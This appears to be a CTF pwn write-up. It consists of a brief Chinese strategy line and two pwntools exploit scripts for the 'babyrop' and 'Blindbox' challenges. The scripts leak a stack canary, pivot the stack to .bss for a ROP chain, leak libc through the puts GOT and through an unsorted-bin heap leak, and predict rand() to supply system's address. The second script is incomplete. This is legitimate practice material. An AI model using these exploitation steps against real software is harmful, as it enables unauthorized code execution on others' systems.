name 泄露 canary,利用 vuln函数中的 read 写 rop 到 bss 段上,栈迁移后 one_gadget
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| from pwn import * from LibcSearcher import * import time, sys, base64
context.os = 'linux' context.arch = 'amd64'
context.log_level = 'debug'
debug = 1 filename = 'babyrop'
if debug == 1 : p = process(filename) if debug == 2: p = remote('',65004) if debug == 3: p = remote('',12345)
elf = ELF(filename) libc = elf.libc puts_plt = elf.plt['puts'] puts_got = elf.got['puts'] leave_addr = 0x400759 pop_rdi = 0x400913 vuln_read = 0x40072E call_puts = 0x40086E
p.sendlineafter('name? \n','a'*25) p.recvuntil('a'*25) canary = u64(p.recv(7).rjust(8,'\x00')) log.success('canary: ' + hex(canary)) p.sendlineafter('unlock this challenge\n',str(0x4009AE))
payload = 'a'*0x18 + p64(canary) + p64(0x601800) + p64(vuln_read) gdb.attach(p) p.sendafter('message\n',payload)
payload = p64(pop_rdi) + p64(puts_got) + p64(call_puts) payload += p64(canary) + p64(0x601800-0x28) + p64(leave_addr) p.send(payload)
libc_base = u64(p.recv(6).ljust(8,'\x00'))-0x6f6a0 log.success('libc_base: ' + hex(libc_base))
one = libc_base + 0x45226 payload = 'a'*0x18 + p64(canary) + p64(0) + p64(one) p.sendline(payload)
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| from pwn import * from LibcSearcher import * import time, sys, base64 from ctypes import cdll
context.os = 'linux' context.arch = 'amd64'
context.log_level = 'debug'
debug = 1 filename = 'Blindbox'
if debug == 1 : p = process(filename) if debug == 2: p = remote('node4.buuoj.cn',20002) if debug == 3: p = remote('',12345)
elf = ELF(filename) libc = elf.libc
def cmd(index): p.sendlineafter('>> ',str(index))
def add(c1,index): cmd(1) p.sendlineafter('>> ',str(c1)) p.sendlineafter('Blindbox(1-3):',str(index))
def edit(index,content): cmd(4) p.sendlineafter('Index :',str(index)) p.sendlineafter('Size of Heap : ',str(len(content))) p.sendlineafter('Content of heap : ',content)
def free(index): cmd(2) p.sendlineafter('drop?',str(index))
def show(index): cmd(3) p.sendlineafter('open?',str(index))
p.sendlineafter('name:','aaaa') p.sendlineafter('number?',str(0x88)) p.sendlineafter('number?',str(0x88)) p.sendlineafter('number?',str(0x88))
for i in range(7): add(1,1) free(1)
add(1,1) add(1,2) free(1) show(1) p.recvuntil('Content of this Blindbox: ') libc_base = u64(p.recvuntil('\x7e')[-6:].ljust(8,'\x00')) - 0x1ebbe0 log.success('libc_base: ' + hex(libc_base)) system_addr = libc_base + libc.sym['system']
lb = cdll.LoadLibrary('./libc-2.31.so') lb.srand(0) choose(6) for i in range(8): number = system_addr ^ lb.rand() p.sendlineafter("Please guess>", str(number))